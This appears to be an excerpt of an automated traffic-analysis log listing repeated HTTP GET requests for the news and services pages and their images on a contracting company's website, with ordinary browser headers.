Source: global trafficHTTP traffic detected: GET /uploads/projects/28/d42724b6981b1026789790a7700c638e.webp HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /uploads/projects/26/a417b2689f08829d773cb2abc660a2f4.webp HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /news HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /uploads/news/2/d80813aa6c19571f16d2a8796b810d49.jpeg HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.citydiamondcontracting.com/newsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /uploads/news/10/610a9221fa6b94cfeb442620ff5d49ea.jpg HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.citydiamondcontracting.com/newsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /uploads/news/3/3ab20c2822ba796ca4c90a82eae00b78.jpg HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.citydiamondcontracting.com/newsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /uploads/news/4/0538734f181f0860806608250501d2ae.jpg HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.citydiamondcontracting.com/newsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /uploads/news/5/49f7ca793fcb324d2166d6e2a915044f.jpg HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.citydiamondcontracting.com/newsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /uploads/news/6/d7944471f1da95e5c78fcd38e3d0c93e.jpg HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.citydiamondcontracting.com/newsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /uploads/news/7/37084e21a1e397964e863e3221dbb8f2.jpg HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.citydiamondcontracting.com/newsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /uploads/dynamic/14/8b17fc00a52e697a42c3c2c98aaff156.webp HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.citydiamondcontracting.com/newsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /uploads/news/8/f4810eb779b4747ca187846d0aff124a.jpg HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.citydiamondcontracting.com/newsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /uploads/news/2/d80813aa6c19571f16d2a8796b810d49.jpeg HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /uploads/news/4/0538734f181f0860806608250501d2ae.jpg HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /uploads/news/10/610a9221fa6b94cfeb442620ff5d49ea.jpg HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /uploads/news/3/3ab20c2822ba796ca4c90a82eae00b78.jpg HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /uploads/news/5/49f7ca793fcb324d2166d6e2a915044f.jpg HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /uploads/news/6/d7944471f1da95e5c78fcd38e3d0c93e.jpg HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /uploads/news/7/37084e21a1e397964e863e3221dbb8f2.jpg HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /uploads/dynamic/14/8b17fc00a52e697a42c3c2c98aaff156.webp HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /uploads/news/8/f4810eb779b4747ca187846d0aff124a.jpg HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /services HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /uploads/services/1/3fbdb2fd59d795b1615bcf06b1608459.jpg HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.citydiamondcontracting.com/servicesAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /uploads/services/8/7523864d851a062fc2bcbe906bf008d5.jpg HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.citydiamondcontracting.com/servicesAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /uploads/services/9/e453bc3c57f4421ad6cb5bc1be7d8d45.jpg HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.citydiamondcontracting.com/servicesAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /uploads/services/6/c569183b81957ddaf8c75690a8cbfe28.jpg HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.citydiamondcontracting.com/servicesAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /uploads/dynamic/16/e9cd8560c0fb5980f7f1767f84634dfb.jpg HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.citydiamondcontracting.com/servicesAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /uploads/services/2/0a2cabcf66a453f359c982144e5981b0.jpg HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.citydiamondcontracting.com/servicesAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /uploads/services/1/3fbdb2fd59d795b1615bcf06b1608459.jpg HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /uploads/services/3/cfea3c00d03e25b1000c418caee5bc94.jpg HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.citydiamondcontracting.com/servicesAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /uploads/services/5/6b7430e47711776a692abe259b42d33c.jpg HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.citydiamondcontracting.com/servicesAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /uploads/services/4/46cd0976d13895f96aeaa080fed61a69.jpg HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.citydiamondcontracting.com/servicesAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /uploads/services/7/b1dc02449d030b39b8114e1de7955bbd.jpg HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.citydiamondcontracting.com/servicesAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /uploads/services/9/e453bc3c57f4421ad6cb5bc1be7d8d45.jpg HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /uploads/services/8/7523864d851a062fc2bcbe906bf008d5.jpg HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /uploads/services/6/c569183b81957ddaf8c75690a8cbfe28.jpg HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /uploads/services/2/0a2cabcf66a453f359c982144e5981b0.jpg HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /uploads/services/3/cfea3c00d03e25b1000c418caee5bc94.jpg HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /uploads/services/4/46cd0976d13895f96aeaa080fed61a69.jpg HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /uploads/services/5/6b7430e47711776a692abe259b42d33c.jpg HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /uploads/services/7/b1dc02449d030b39b8114e1de7955bbd.jpg HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /uploads/dynamic/16/e9cd8560c0fb5980f7f1767f84634dfb.jpg HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
